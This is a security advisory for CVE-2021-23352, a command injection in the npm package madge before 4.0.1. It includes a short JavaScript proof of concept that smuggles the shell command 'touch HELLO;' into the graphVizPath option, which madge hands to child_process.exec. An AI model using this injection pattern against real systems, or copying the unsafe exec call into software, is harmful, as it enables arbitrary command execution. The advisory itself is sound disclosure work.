GHSA-753c-phhg-cj29
Dashboard / Vulnerabilities / GHSA-753c-phhg-cj29
GHSA-753c-phhg-cj29
Summary: Madge vulnerable to command injection
Details: This affects the package madge before 4.0.1. It is possible to specify a custom Graphviz path via the graphVizPath option parameter which, when the .image(), .svg() or .dot() functions are called, is executed by the childprocess.exec function. ### PoC ```js const madge = require('madge'); madge('..', {graphVizPath: "touch HELLO;"}) .then((res) => res.svg()) .then((writtenImagePath) => { console.log('Image written to ' + writtenImagePath); }); ```
References: https://nvd.nist.gov/vuln/detail/CVE-2021-23352, https://github.com/pahen/madge/commit/da5cbc9ab30372d687fa7c324b22af7ffa5c6332, https://github.com/pahen/madge/blob/master/lib/graph.js#L27, https://snyk.io/vuln/SNYK-JS-MADGE-1082875
Affected packages
Package
Name: madge
Purl: pkg:npm/madge
Affected ranges
Type: SEMVER
Events:
